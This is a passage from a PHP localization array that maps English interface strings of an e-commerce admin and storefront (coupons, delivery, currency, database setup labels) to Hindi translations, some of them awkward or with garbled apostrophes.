'विकल्प शीर्षक', 'Choose' => 'चुनना', 'Choose Image' => 'छवि चुनें', 'Choose Option' => 'विकल्प चुनें', 'Choose Payment Method' => 'भुगतान का तरीका चुनें', 'Choose file' => 'फाइलें चुनें', 'Choose_Address_Type' => 'पता प्रकार चुनें', 'Choose_Label' => 'लेबल चुनें', 'Choose_Logo' => 'लोगो चुनें', 'Choose_Option' => 'विकल्प चुनें', 'City' => 'शहर', 'Classic' => 'क्लासिक', 'Classic Sneakers For Men' => 'पुरुषों के लिए क्लासिक स्नीकर्स', 'Clean' => 'साफ', 'Clean_Database' => 'स्वच्छ डेटाबेस', 'Clear' => 'स्पष्ट', 'Clear_All' => 'सभी साफ करें', 'Click' => 'क्लिक', 'Click & Collect' => 'क्लिक करें और इकट्ठा करें', 'Click Continue and Download the file in device named AuthKey_ID.p8 (Store it safely and it is used for push notification)' => 'जारी रखें पर क्लिक करें।', 'Click Here' => 'यहाँ क्लिक करें', 'Click Plus icon - select App IDs - click on Continue' => 'प्लस आइकन पर क्लिक करें - ऐप आईडी का चयन करें - जारी रखें पर क्लिक करें', 'Click to Reset' => 'रीसेट करने के लिए क्लिक करें', 'Click_here' => 'यहाँ क्लिक करें', 'Client' => 'ग्राहक', 'Client ID' => 'ग्राहक ID', 'Client OAuth Login' => 'ग्राहक oauth लॉगिन', 'Client Secret' => 'ग्राहक गुप्त', 'Close' => 'बंद करना', 'Close sidebar' => 'साइडबार को बंद करें', 'Close_Ticket' => 'बंद टिकट', 'Close_this_ticket' => 'इस टिकट को बंद करें', 'Close_ticket' => 'बंद टिकट', 'Code' => 'कोड', 'Codecanyon' => 'CodeCanyon', 'Color' => 'रंग', 'Color_Variant' => 'रंग प्रकार', 'Colors' => 'रंग की', 'Comic Book' => 'हास्य पुस्तक', 'Comic book pdf' => 'कॉमिक बुक पीडीएफ', 'Comment' => 'टिप्पणी', 'Commission' => 'आयोग', 'Commission Earning' => 'आयोग की कमाई', 'Commission Given' => 'दी गई', 'Commission_Given' => 'दी गई', 'Company Vehicle' => 'कंपनी वाहन', 'Company_Copyright_Text' => 'कंपनी कॉपीराइट पाठ', 'Company_Information' => 'कारखाना की जानकारी', 'Compare' => 'तुलना करना', 'Compare_List' => 'सूची की तुलना करें', 'Complaint' => 'शिकायत', 'Complete Registration' => 'पूरा पंजीकरण', 'Complete the' => 'को पूर्ण करो', 'Complete the add details form and press' => 'Add विवरण फ़ॉर्म को पूरा करें और दबाएं', 'Completed_Orders' => 'पूर्ण आदेश', 'Completion Rate' => 'समापन दर', 'Computer Office & Security' => 'कंप्यूटर कार्यालय और सुरक्षा', 'Computer & Office' => 'कंप्यूटर और कार्यालय', 'Computer Ram' => 'कंप्यूटर राम', 'Configuration_updated_successfully' => 'कॉन्फ़िगरेशन सफलतापूर्वक अपडेट किया गया', 'Configure' => 'कॉन्फ़िगर', 'Configure_your_mail_setup_first' => 'पहले अपना मेल सेटअप कॉन्फ़िगर करें', 'Confirm' => 'पुष्टि करना', 'Confirm Email' => 'ईमेल की पुष्टि करें', 'Confirm Password' => 'पासवर्ड की पुष्टि कीजिये', 'Confirm your new password' => 'अपने नए पासवर्ड की पुष्टि करें', 'Confirm_Password' => 'पासवर्ड की पुष्टि कीजिये', 'Confirmed' => 'की पुष्टि', 'Connection' => 'संबंध', 'Consumer electronics' => 'उपभोक्ता इलेक्ट्रॉनिक्स', 'Contact' => 'संपर्क', 'Contact List' => 'संपर्क सूची', 'Contact Number' => 'संपर्क संख्या', 'Contact Person Name' => 'संपर्क व्यक्ति का नाम', 'Contact Us' => 'संपर्क करें', 'Contact View' => 'संपर्क दृश्य', 'Contact info' => 'संपर्क सूचना', 'Contact_Info' => 'संपर्क सूचना', 'Contact_Number' => 'संपर्क संख्या', 'Contact_Person' => 'संपर्क व्यक्ति', 'Contact_Person_Name' => 'संपर्क व्यक्ति का नाम', 'Contact_deleted_successfully' => 'संपर्क को सफलतापूर्वक हटा दिया गया', 'Continue' => 'जारी रखना', 'Continue_Shopping' => 'खरीदारी जारी रखें', 'Convert_to_Currency' => 'मुद्रा में परिवर्तित करें', 'Convert_your_loyalty_point_to_wallet_money.' => 'अपने वफादारी बिंदु को बटुए के पैसे में बदलें।', 'Convert_your_loyalty_points_into_wallet_money' => 'अपने वफादारी बिंदुओं को बटुए के पैसे में बदलें', 'Cookie_Settings' => 'कुकी सेटिंग्स', 'Cooking Recipe' => 'खाना पकाने का नुस्खा', 'Cooking Recipe Book' => 'खाना पकाने की नुस्खा बुक', 'Copied successfully' => 'सफलतापूर्वक कॉपी किया गया', 'Copied to the clipboard' => 'क्लिपबोर्ड पर कॉपी किया गया', 'Copied_to_the_clipboard' => 'क्लिपबोर्ड पर कॉपी किया गया', 'Copy' => 'प्रतिलिपि', 'Copy URI' => 'कॉपीरी', 'Copy_Site_Key_and_Secret_Key _Paste_in_the_input_filed_below_and_Save.' => 'नीचे दिए गए इनपुट में साइट कुंजी और गुप्त कुंजी पेस्ट कॉपी करें और सहेजें।', 'Copyright' => 'कॉपीराइट', 'Country' => 'देश', 'Country Fair' => 'देश मेला', 'Coupon' => 'कूपन', 'Coupon Add' => 'कूपन जोड़ें', 'Coupon Discount' => 'कूपन छूट', 'Coupon Edit' => 'कूपन संपादित करना', 'Coupon code' => 'कूपन कोड', 'Coupon_Discount' => 'कूपन छूट', 'Coupon_Discount_Amount' => 'कूपन छूट राशि', 'Coupon_added_successfully' => 'कूपन ने सफलतापूर्वक जोड़ा', 'Coupon_discount' => 'कूपन छूट', 'Coupon_status_updated' => 'कूपन स्थिति अद्यतन की गई', 'Coupon_updated_successfully' => 'कूपन सफलतापूर्वक अपडेट किया गया', 'Crave' => 'तरसना', 'Create' => 'बनाएं', 'Create App' => 'ऐप बनाएँ', 'Create Role' => 'भूमिका बनाएं', 'Create credentials' => 'क्रेडेंशियल्स बनाएं', 'Create_your_own_business' => 'अपना खुद का व्यवसाय बनाएं', 'Create_your_own_store.' => 'अपना खुद का स्टोर बनाएं।', 'Credential Setup' => 'साख सेटअप', 'Credentials SetUp' => 'साख सेटअप', 'Credentials_SetUp_page' => 'साख सेटअप पृष्ठ', 'Credit' => 'श्रेय', 'Credit / Debit card ( Stripe )' => 'क्रेडिट कार्ड (धारी)', 'Currency' => 'मुद्रा', 'Currency Code' => 'मुद्रा कोड', 'Currency Name' => 'मुद्रा नाम', 'Currency Symbol' => 'मुद्रा चिन्ह', 'Currency Symbol Position' => 'मुद्रा प्रतीक स्थिति', 'Currency changed to' => 'मुद्रा में बदल गई', 'Currency removed successfully!' => 'मुद्रा को सफलतापूर्वक हटा दिया गया!', 'Currency status successfully changed.' => 'मुद्रा की स्थिति सफलतापूर्वक बदल गई।', 'Currency updated successfully!' => 'मुद्रा को सफलतापूर्वक अपडेट किया गया!', 'Currency_Setup' => 'मुद्रा -अनुष्ठान', 'Current Stock' => 'वर्तमान स्टॉक', 'Current Stock Amount' => 'चालू स्टॉक राशि', 'Current_Stock' => 'वर्तमान स्टॉक', 'Current_Stock_Amount' => 'चालू स्टॉक राशि', 'Custom Date' => 'कस्टम तिथि', 'Custom_Date' => 'कस्टम तिथि', 'Customeer_Added_Successfully' => 'कस्टोमर ने सफलतापूर्वक जोड़ा', 'Customer' => 'ग्राहक', 'Customer Details' => 'ग्राहक विवरण', 'Customer ID' => 'ग्राहक आईडी', 'Customer List' => 'ग्राहकू सूची', 'Customer Message' => 'ग्राहक संदेश', 'Customer Name' => 'ग्राहक का नाम', 'Customer details' => 'ग्राहक विवरण', 'Customer_Info' => 'ग्राहक की जानकारी', 'Customer_List' => 'ग्राहकू सूची', 'Customer_Name' => 'ग्राहक का नाम', 'Customer_Verify' => 'ग्राहक सत्यापित करें', 'Customer_information' => 'ग्राहक सूचना', 'Customer_list' => 'ग्राहकू सूची', 'Customer_not_found' => 'ग्राहक नहीं मिला', 'Customer_not_found_or_Account_has_been_suspended' => 'ग्राहक को नहीं मिला या खाता निलंबित कर दिया गया है', 'Customer_review' => 'ग्राहक समीक्षा', 'Customers' => 'ग्राहकों', 'Customers_will_not_be_able_to_order_or_purchase_from_his_shop' => 'ग्राहक उसकी दुकान से ऑर्डर या खरीद नहीं कर पाएंगे', 'DB_CONNECTION' => 'DB कनेक्शन', 'DB_DATABASE' => 'डीबी डेटाबेस', 'DB_HOST' => 'डीबी होस्ट', 'DB_PASSWORD' => 'Db पासवर्ड', 'DB_PORT' => 'डीबी बंदरगाह', 'DB_USERNAME' => 'डीबी उपयोगकर्ता नाम', 'DB_clean' => 'डीबी साफ', 'DB_connection' => 'DB कनेक्शन', 'DB_database' => 'डीबी डेटाबेस', 'DB_host' => 'डीबी होस्ट', 'DB_password' => 'Db पासवर्ड', 'DB_port' => 'डीबी बंदरगाह', 'DB_username' => 'डीबी उपयोगकर्ता नाम', 'DELIVERY' => 'वितरण', 'DESC' => 'वर्णन', 'Dashboard' => 'चकरानेवाला', 'Data_updated_successfully!' => 'डेटा सफलतापूर्वक अपडेट किया गया!', 'Date' => 'तारीख', 'Date Submitted' => 'प्रस्तुत दिनांक', 'Days' => 'दिन', 'Deal Of The Day' => 'दिन का एक सौदा', 'Deal Page' => 'सौदा पृष्ठ', 'Deal Product' => 'सौदा उत्पाद', 'Deal Update' => 'सौदा अद्यतन', 'Deal of the Day' => 'दिन का एक सौदा', 'Deal of the day form' => 'दिन के रूप में सौदा', 'Debit' => 'खर्चे में लिखना', 'Default' => 'गलती करना', 'Default Sales Commission' => 'डिफ़ॉल्ट बिक्री आयोग', 'Default_Method_updated_failed.' => 'डिफ़ॉल्ट विधि अद्यतन विफल।', 'Default_Method_updated_successfully' => 'डिफ़ॉल्ट विधि सफलतापूर्वक अपडेट की गई', 'Delete' => 'मिटाना', 'Delete_My_Account' => 'मेरा एकाउंट हटा दो', 'Delivered' => 'पहुंचा दिया', 'Delivered_By' => 'द्वारा वितरित', 'Delivered_Orders' => 'आदेश दिए गए आदेश', 'Delivery' => 'वितरण', 'Delivery status updated to' => 'डिलीवरी की स्थिति को अपडेट किया गया', 'Delivery-Man' => 'डिलीवरी मैन', 'Delivery-man removed!' => 'डिलीवरी-मैन हटा दिया गया!', 'Delivery_Address' => 'डिलिवरी का पता', 'Delivery_Charge' => 'वितरण शुल्क', 'Delivery_Information_Details' => 'वितरण सूचना विवरण', 'Delivery_Man' => 'डिलीवरी मैन', 'Delivery_Man_Info' => 'डिलीवरी मैन जानकारी', 'Delivery_Restriction' => 'वितरण प्रतिबंध', 'Delivery_man' => 'डिलीवरी मैन', 'Delivery_unavailable_for_this_country' => 'इस देश के लिए डिलीवरी अनुपलब्ध है', 'Delivery_unavailable_for_this_zip_code_area' => 'इस ज़िप कोड क्षेत्र के लिए डिलीवरी अनुपलब्ध है', 'Delivery_unavailable_in_this_country' => 'इस देश में डिलीवरी अनुपलब्ध है', 'Deliveryman List' => 'डिलीवरीमैन सूची', 'Deliveryman_Review' => 'डिलीवरीमैन की समीक्षा', 'Deluxe Online' => 'डीलक्स ऑनलाइन', 'Deluxe Online Deluxe' => 'डीलक्स ऑनलाइन डीलक्स', 'Deluxe Online Deluxe Online' => 'डीलक्स ऑनलाइन डीलक्स ऑनलाइन', 'Denied' => 'अस्वीकृत', 'Deny' => 'अस्वीकार करना', 'Description' => 'विवरण', 'Details' => 'विवरण', 'Dev' => 'देव', 'Digital Files' => 'डिजिटल फाइलें', 'Digital Payments' => 'अंकीय भुगतान', 'Digital Product' => 'अंकीय उत्पाद', 'Digital Product House' => 'अंकीय उत्पाद गृह', 'Digital Product on/off' => 'डिजिटल उत्पाद ऑन/ऑफ', 'Digital_Payment' => 'अंकीय भुगतान', 'Digital_Payments' => 'अंकीय भुगतान', 'Discount' => 'छूट', 'Discount Given' => 'दी गई छूट', 'Discount can not be more or equal to the price!' => 'छूट कीमत के अधिक या बराबर नहीं हो सकती है!', 'Discount on Purchase' => 'खरीद पर छूट', 'Discount_Amount' => 'छूट राशि', 'Discount_Given' => 'दी गई छूट', 'Discount_Type' => 'छूट प्रकार', 'Discount_on_Purchase' => 'खरीद पर छूट', 'Discount_on_product' => 'उत्पाद की छूट', 'Discounted_Amount' => 'रियायती राशि', 'Discounted_Products' => 'रियायती उत्पाद', 'Do you want to delete this ' => 'क्या आप इसे हटाना चाहते हैं', 'Do you want to logout' => 'क्या आप लॉगआउट करना चाहते हैं', 'Do_not_Logout' => 'लॉगआउट न करें', 'Do_not_Miss_Todays_Deal' => 'आज के सौदे को याद मत करो', 'Do_not_delete' => 'हटाना मत', 'Do_you_want_to_logout' => 'क्या आप लॉगआउट करना चाहते हैं', 'Doe' => 'हरिणी', 'Don t Delete' => 'डॉन टी डिलीट', 'Don`t_have_the_template_ ' => 'डॉन `टी टेम्पलेट है', 'Donât_Miss_Todays_Deal' => 'डॉन टी मिस टोड्स डील', 'Donât_Miss_the_Chance' => 'डॉन टी चूक मौका', 'Donât_have_account' => 'Donâ t का खाता है', 'Double Fan' => 'डबल प्रशंसक', 'Download' => 'Download', 'Download Format' => 'डाउनलोड प्रारूप', 'Download Generate Sitemap' => 'डाउनलोड करें SiteMap', 'Download PDF' => 'डाउनलोड पीडीऍफ़', 'Download the file in device named' => 'फ़ाइल को डिवाइस में डाउनलोड करें', 'Download the format file and fill it with proper data' => 'प्रारूप फ़ाइल डाउनलोड करें और इसे उचित डेटा से भरें', 'Download the format file and fill it with proper data.' => 'प्रारूप फ़ाइल डाउनलोड करें और इसे उचित डेटा से भरें।', 'Dress' => 'पोशाक', 'Driver' => 'चालक', 'Due_Amount' => 'बकाया राशि', 'Duration' => 'अवधि', 'Dynamova' => 'डायनामोवा', 'E- tech' => 'ई-टेक', 'EGP_currency_is_required' => 'ईजीपी मुद्रा की आवश्यकता है', 'EX' => 'पूर्व', 'EX of SMS provider s template => your OTP is XXXX here please check' => 'एसएमएस प्रदाता एस टेम्पलेट का पूर्व=> आपका OTP XXXX है यहाँ कृपया जाँच करें', 'EX of SMS provider s template => your OTP is XXXX here please check' => 'एसएमएस प्रदाता एस टेम्पलेट का पूर्व=> आपका OTP XXXX है यहाँ कृपया जाँच करें', 'EX=>123' => 'पूर्व=> 123', 'EX_of_SMS_providers_template_=>_your_OTP_is_XXXX_here_please_check' => 'एसएमएस प्रदाताओं के पूर्व टेम्पलेट=> आपका OTP XXXX है यहाँ कृपया जाँच करें', 'Earn From Order' => 'आदेश से कमाएं', 'Earn From Shipping' => 'शिपिंग से कमाएं', 'Earn_From_Order' => 'आदेश से कमाएं', 'Earn_From_Shipping' => 'शिपिंग से कमाएं', 'Earn_as_Delivery_Man' => 'डिलीवरी मैन के रूप में कमाएं', 'Earn_money _o_your_wallet_by_completingthe_offer_&_challenged' => 'प्रस्ताव पूरा करके अपने बटुए को पैसे कमाएं और चुनौती दी', 'Earn_money_to_your_wallet_by_completing_the_offer_&_challenged' => 'प्रस्ताव पूरा करके अपने बटुए में पैसे कमाएं और चुनौती दी', 'Earning' => 'कमाई', 'Earning Report' => 'अर्जक रिपोर्ट', 'Earning Statistics' => 'अर्जित आंकड़े', 'Earning statistics for business analytics' => 'व्यापार विश्लेषण के लिए सांख्यिकी अर्जित करना', 'Earning_From_Shipping' => 'शिपिंग से कमाई', 'Earning_Report' => 'अर्जक रिपोर्ट', 'Earning_Reports' => 'अर्जित रिपोर्ट', 'Earning_Statistics' => 'अर्जित आंकड़े', 'Earning_statistics' => 'अर्जित आंकड़े', 'Easy Electronics' => 'आसान इलेक्ट्रॉनिक्स', 'Ecommerce' => 'ई-कॉमर्स', 'Edit' => 'संपादन करना', 'Edit Bank Info' => 'बैंक जानकारी संपादित करें', 'Edit Modal Help Topic' => 'मोडल हेल्प टॉपिक संपादित करें', 'Edit Role' => 'भूमिका संपादित करें', 'Edit Shipping' => 'शिपिंग संपादित करें', 'Edit Shop Info' => 'दुकान की जानकारी संपादित करें', 'Edit_Bank_Info' => 'बैंक जानकारी संपादित करें', 'Edit_Bank_info' => 'बैंक जानकारी संपादित करें', 'Edit_My_Profile' => 'मेरे प्रोफ़ाइल संपादित करे', 'Edit_Personal_Details' => 'व्यक्तिगत विवरण संपादित करें', 'Edit_Profile' => 'प्रोफ़ाइल संपादित करें', 'Edit_Shop_Info' => 'दुकान की जानकारी संपादित करें', 'Electron Pro' => 'इलेक्ट्रॉन समर्थक', 'Electronic Agile' => 'इलेक्ट्रॉनिक चुस्त', 'Electronics' => 'इलेक्ट्रानिक्स', 'Email' => 'ईमेल', 'Email Verification' => 'ईमेल सत्यापन', 'Email_Verification' => 'ईमेल सत्यापन', 'Emergency_Contact' => 'आपातकालीन संपर्क', 'Employee' => 'कर्मचारी', 'Employee Add' => 'कर्मचारी जोड़ें', 'Employee Edit' => 'कर्मचारी संपादन', 'Employee List' => 'कर्मचारी सूची', 'Employee Roles' => 'कर्मचारी भूमिकाएँ', 'Employee_Role_Setup' => 'कर्मचारी भूमिका -सेटअप', 'Employee_Section' => 'कर्मचारी अनुभाग', 'Employee_Update' => 'कर्मचारी अद्यतन', 'Employees' => 'कर्मचारी', 'Empty' => 'खाली', 'Encryption' => 'कूटलेखन', 'End Date' => 'अंतिम तिथि', 'End_Date' => 'अंतिम तिथि', 'Enjoy New experience' => 'नए अनुभव का आनंद लें', 'Enjoy_New_experience' => 'नए अनुभव का आनंद लें', 'Enter Social Media Link' => 'सोशल मीडिया लिंक दर्ज करें', 'Enter captcha value' => 'कैप्चा मान दर्ज करें', 'Enter choice values' => 'विकल्प मान दर्ज करें', 'Enter currency Name' => 'मुद्रा का नाम दर्ज करें', 'Enter currency code' => 'मुद्रा कोड दर्ज करें', 'Enter currency exchange rate' => 'मुद्रा विनिमय दर दर्ज करें', 'Enter currency symbol' => 'मुद्रा प्रतीक दर्ज करें', 'Enter new email address' => 'नया ईमेल पता दर्ज करें', 'Enter new password' => 'नया पासवर्ड दर्ज करें', 'Enter recaptcha value' => 'Recaptcha मान दर्ज करें', 'Enter your email address' => 'अपना ईमेल पता दर्ज करें', 'Enter_Attribute_Name' => 'विशेषता नाम दर्ज करें', 'Enter_Your_City' => 'अपने शहर में प्रवेश करें', 'Enter_Your_zip_code' => 'अपना ज़िप कोड दर्ज करें', 'Enter_banner_sub_title' => 'बैनर उप शीर्षक दर्ज करें', 'Enter_banner_title' => 'बैनर शीर्षक दर्ज करें', 'Enter_button_text' => 'बटन पाठ दर्ज करें', 'Enter_captcha_value' => 'कैप्चा मान दर्ज करें', 'Enter_email' => 'ईमेल दर्ज करें', 'Enter_email_address_or_phone_number' => 'ईमेल पता या फ़ोन नंबर दर्ज करें', 'Enter_email_number' => 'ईमेल नंबर दर्ज करें', 'Enter_email_or_phone_number' => 'ईमेल या फ़ोन नंबर दर्ज करें', 'Enter_password' => 'पास वर्ड दर्ज करें', 'Enter_phone_number' => 'फोन नंबर दर्ज', 'Enter_url' => 'यू आर एल दर्ज करो', 'Enter_your_email' => 'अपना ईमेल दर्ज करें', 'Enter_your_order_ID_& _phone_to_get_delivery_updates' => 'डिलीवरी अपडेट प्राप्त करने के लिए अपना ऑर्डर आईडी और फ़ोन दर्ज करें', 'Enter_your_order_ID_&_phone ' => 'अपना ऑर्डर आईडी और फ़ोन दर्ज करें', 'Enter_your_order_ID_&_phone_to_get_delivery_updates' => 'डिलीवरी अपडेट प्राप्त करने के लिए अपना ऑर्डर आईडी और फ़ोन दर्ज करें', 'Environment_Information' => 'पर्यावरण सूचना', 'Environment_Setup' => 'पर्यावरणीय सेटअप', 'Eratmart' => 'इराटमार्ट', 'Error' => 'गलती', 'Error Something went wrong' => 'त्रुटि कुछ गलत हो गई', 'ErrorSomething went wrong' => 'त्रुटि कुछ गलत हो गई', 'Estimated Delivary Date' => 'Estimated Delivary Date', 'Ex' => 'पूर्व', 'Ex => 017********' => 'Ex=> 017 ********', 'Ex => DH-23434-LS' => 'Ex=> DH-23434-LS', 'Ex => ex@example.com' => 'Ex=> ex@example.com', 'Ex => password' => 'Ex=> पासवर्ड', 'Ex=> 01xxxxxxxxx' => 'Ex=> 01xxxxxxxxxx', 'Ex=> 10' => 'पूर्व=> १०', 'Ex=> 100' => 'पूर्व=> 100', 'Ex=> 1216' => 'Ex=> 1216', 'Ex=> 1234567890' => 'Ex=> 1234567890', 'Ex=> 32416436546' => 'Ex=> 32416436546', 'Ex=> 5' => 'पूर्व=> ५', 'Ex=> 500' => 'पूर्व=> ५००', 'Ex=> 5000' => 'Ex=> 5000', 'Ex=> 6+ character' => 'पूर्व=> 6+ चरित्र', 'Ex=> 8+ Character' => 'Ex=> 8+ चरित्र', 'Ex=> 987652' => 'Ex=> 987652', 'Ex=> 9876543210' => 'Ex=> 9876543210', 'Ex=> Dhaka' => 'Ex=> Dhaka', 'Ex=> EID_Dhamaka' => 'Ex=> EID Dhamaka', 'Ex=> English' => 'Ex=> अंग्रेजी', 'Ex=> F-12345678' => 'Ex=> F-12345678', 'Ex=> John Doe' => 'Ex=> जॉन डो', 'Ex=> Street 1 Street 2 Street 3 Street 4' => 'Ex=> स्ट्रीट 1 स्ट्रीट 2 स्ट्रीट 3 स्ट्रीट 4', 'Ex=> abcd1234efgh5678ijklmnop90qrstuvwxYZ' => 'EX=> ABCD1234EFGH5678IJKLMNOP90QRSTUVWXYZ', 'Ex=> https=>//play.google.com/store/apps' => 'Ex=> https=>//play.google.com/store/apps', 'Ex=> https=>//www.apple.com/app-store/' => 'Ex=> https=>//www.apple.com/app-store/', 'Ex=> john@gmail.com' => 'Ex=> john@gmail.com', 'Ex=> my-awesome-app-12345' => 'Ex=> मेरे-भयानक-APP-12345', 'Ex=> my-awesome-app.appspot.com' => 'Ex=> my-awesome-app.appspot.com', 'Ex=> my-awesome-app.firebaseapp.com' => 'Ex=> my-awesome-app.firebaseapp.com', 'Ex=>01xxxxxxxxx' => 'Ex=> 01xxxxxxxxxx', 'Ex=>_01XXXXXX' => 'Ex=> 01xxxxxxx', 'Ex=>_01xxxxxxxxx' => 'Ex=> 01xxxxxxxxxx', 'Ex=>_1216_Dhaka' => 'Ex=> 1216 Dhaka', 'Ex=>_6+ character' => 'पूर्व=> 6+ चरित्र', 'Ex=>_6+_character' => 'पूर्व=> 6+ चरित्र', 'Ex=>_8+_character' => 'Ex=> 8+ चरित्र', 'Ex=>_Doe' => 'पूर्व=> डो', 'Ex=>_Jhon_Doe' => 'Ex=> JHON DOE', 'Ex=>_Jhone' => 'Ex=> Jhone', 'Ex=>_Riad_Uddin' => 'पूर्व=> रियाद उडिन', 'Ex_=>_Shop_-12_Road-8' => 'Ex=> SHOP -12 रोड -8', 'Ex_=>_ex@example.com' => 'Ex=> ex@example.com', 'Excel' => 'एक्सेल', 'Excellent' => 'उत्कृष्ट', 'Exchange Rate' => 'विनिमय दर', 'Exclusive & Fashionable Suit For Men' => 'पुरुषों के लिए अनन्य और फैशनेबल सूट', 'Expand Menu' => 'मेनू का विस्तार करें', 'Expand cart' => 'कार्ट का विस्तार करें', 'Expand menu' => 'मेनू का विस्तार करें', 'Expense Amount' => 'व्यय राशि', 'Expense Type' => 'व्यय प्रकार', 'Expense_Amount' => 'व्यय राशि', 'Expense_Transaction_Statement' => 'व्यय लेनदेन विवरण', 'Expense_Transactions' => 'व्यय लेनदेन', 'Expense_Type' => 'व्यय प्रकार', 'Explore' => 'अन्वेषण करना', 'Explore_Now' => 'अब अन्वेषण करें', 'Export' => 'निर्यात', 'Extra_discount_can_not_be_more_than_100_percent' => 'अतिरिक्त छूट 100 प्रतिशत से अधिक नहीं हो सकती है', 'FAQ' => 'सामान्य प्रश्न', 'FAQ deleted successfully' => 'FAQ को सफलतापूर्वक हटा दिया गया', 'FAQs' => 'पूछे जाने वाले प्रश्न', 'FCM Project ID' => 'एफसीएम प्रोजेक्ट आईडी', 'FCM Settings' => 'एफसीएम सेटिंग्स', 'FCM_Project_ID' => 'एफसीएम प्रोजेक्ट आईडी', 'FCM_Settings' => 'एफसीएम सेटिंग्स', 'FREE' => 'मुक्त', 'Facebook' => 'फेसबुक', 'Facebook API Set up Instructions' => 'फेसबुक एपीआई ने निर्देश दिए', 'Facebook Login' => 'फेसबुक लॉग इन', 'Failed' => 'असफल', 'Failed To Deliver' => 'वितरित करने में विफल रहा', 'Failed_To_Delivery' => 'प्रसव के लिए विफल', 'Failed_to_Deliver' => 'वितरित करने में विफल रहा', 'Failed_to_deliver' => 'वितरित करने में विफल रहा', 'False' => 'असत्य', 'Fast Delivery all accross the country' => 'तेजी से डिलीवरी सभी देश में', 'Feature Deal' => 'फ़ीचर सौदा', 'Feature Deal Update' => 'फ़ीचर डील अपडेट', 'Featured' => 'प्रदर्शित', 'Featured status updated successfully' => 'विशेष रूप से अद्यतन की गई स्थिति को विशेष रूप से अपडेट किया गया', 'Featured_Deal' => 'विशेष किया गया सौदा', 'Featured_Deals' => 'विशेष रुप से प्रदर्शित सौदे', 'Featured_Products' => 'विशेष रुप से प्रदर्शित प्रोडक्टस', 'Fee' => 'शुल्क', 'Feedback' => 'प्रतिक्रिया', 'File' => 'फ़ाइल', 'File size too big' => 'फ़ाइल का आकार बहुत बड़ा है', 'File type=> jpg jpeg png gif zip pdf' => 'फ़ाइल प्रकार=> JPG JPEG PNG GIF ZIP PDF', 'File type=> jpg jpeg png. Maximum size=> 2MB' => 'फ़ाइल प्रकार=> JPG JPEG PNG। अधिकतम आकार=> 2 एमबी', 'File_type=>_jpg_jpeg_png._Maximum_size' => 'फ़ाइल प्रकार=> JPG JPEG PNG। अधिकतम आकार', 'File_type=>_jpg_jpeg_png._Maximum_size=>_2MB' => 'फ़ाइल प्रकार=> JPG JPEG PNG। अधिकतम आकार=> 2 एमबी', 'Fill in your email address below' => 'नीचे अपना ईमेल पता भरें', 'Fill the form and press' => 'फॉर्म भरें और दबाएं', 'Fill_all_required_fields_of_billing_address' => 'बिलिंग पते के सभी आवश्यक फ़ील्ड भरें', 'Fill_all_required_fields_of_shipping/billing_address' => 'शिपिंग/बिलिंग पते के सभी आवश्यक फ़ील्ड भरें', 'Fill_all_required_fields_of_shipping_address' => 'शिपिंग पते के सभी आवश्यक फ़ील्ड भरें', 'Filter' => 'फ़िल्टर', 'Filter_Data' => 'फ़िल्टर डेटा', 'Filter_Report' => 'फ़िल्टर रिपोर्ट', 'Final_Total' => 'अंतिम कुल', 'Find' => 'खोजो', 'Find_What_You_Need' => 'आपको क्या चाहिए', 'Find_and_select_products_to_see_the_differences_and_similarities_between_them' => 'उनके बीच के अंतर और समानता को देखने के लिए उत्पादों का पता लगाएं और चयन करें', 'Find_us' => 'हमें लगता है', 'Firebase Configuration' => 'फायरबेस विन्यास', 'Firebase Push Notification Setup' => 'फायरबेस पुश नोटिफिकेशन सेटअप', 'First' => 'पहला', 'First name is required!' => 'पहला नाम आवश्यक है!', 'First step' => 'पहला कदम', 'First_Name' => 'पहला नाम', 'First_Order' => 'पहले के आदेश', 'First_Shipping' => 'पहला शिपिंग', 'First_Shipping_all_accross_the_country' => 'पहले शिपिंग सभी देश को प्राप्त करें', 'First_Shipping_all_across_the_country' => 'पूरे देश में पहले शिपिंग', 'Flash Deal' => 'फादल सौदा', 'Flash Deal Products' => 'फ्लैश डील प्रोडक्ट्स', 'Flash Deal Update' => 'फ्लैश डील अपडेट', 'Flash Deals' => 'फ्लैश सौदों', 'Flash Sale for Any Item' => 'किसी भी आइटम के लिए फ्लैश बिक्री', 'Flash_Deal' => 'फादल सौदा', 'Flash_Deals' => 'फ्लैश सौदों', 'Flat' => 'समतल', 'Follow' => 'अनुसरण करना', 'Follow the documentation to setup from app end' => 'ऐप एंड से सेटअप करने के लिए प्रलेखन का पालन करें', 'Follow_Complete' => 'पूरा फॉलो करना', 'Followers' => 'समर्थक', 'Footer Banner' => 'पाद बैनर', 'Footer_Banner' => 'पाद बैनर', 'For mobile app only' => 'केवल मोबाइल ऐप के लिए', 'For multi vendor operation' => 'बहु विक्रेता संचालन के लिए', 'For single vendor operation' => 'एकल विक्रेता संचालन के लिए', 'For single vendor operation deactive all seller!!' => 'एकल विक्रेता ऑपरेशन के लिए सभी विक्रेता !!', 'For single vendor operation deactive all seller!!' => 'एकल विक्रेता ऑपरेशन के लिए सभी विक्रेता !!', 'For single vendor operation please deactive all seller product' => 'एकल विक्रेता ऑपरेशन के लिए कृपया सभी विक्रेता उत्पाद को निष्क्रिय कर दें', 'Forget Password' => 'पासवर्ड भूल गए', 'Forgot Password' => 'पासवर्ड भूल गए', 'Forgot your password' => 'अपना कूट शब्द भूल गए', 'Forgot_Password' => 'पासवर्ड भूल गए', 'Fourth step' => 'चौथा चरण', 'Framerce' => 'फेरना', 'Free Delivery' => 'नि=> शुल्क डिलिवरी', 'Free_Delivery' => 'नि=> शुल्क डिलिवरी', 'Free_Delivery_Amount' => 'नि=> शुल्क वितरण राशि', 'Free_Delivery_Coupon' => 'नि=> शुल्क वितरण कूपन', 'Free_Delivery_on_Coupon_Discount' => 'कूपन छूट पर मुफ्त वितरण', 'Free_Shipping' => 'मुफ़्त शिपिंग', 'Free_Shipping_on_all_Order_Above_$560' => '$ 560 से ऊपर के सभी आदेशों पर मुफ्त शिपिंग', 'Fresh_Product' => 'ताजा उत्पाद', 'From' => 'से', 'From About You tab press' => 'आप के बारे में टैब प्रेस', 'From Contact Info tab provide' => 'संपर्क जानकारी टैब प्रदान करें', 'From Register tab press' => 'रजिस्टर टैब प्रेस से', 'From Verify Account tab' => 'सत्यापित खाता टैब से', 'Full' => 'भरा हुआ', 'Full Name' => 'पूरा नाम', 'GST' => 'जीएसटी', 'GST Number' => 'जीएसटी नंबर', 'GST_Number' => 'जीएसटी नंबर', 'Gadgets' => 'गैजेट', 'Gamming Laptop' => 'लैपटॉप', 'General Info' => 'सामान्य जानकारी', 'General_Info' => 'सामान्य जानकारी', 'General_Information' => 'सामान्य 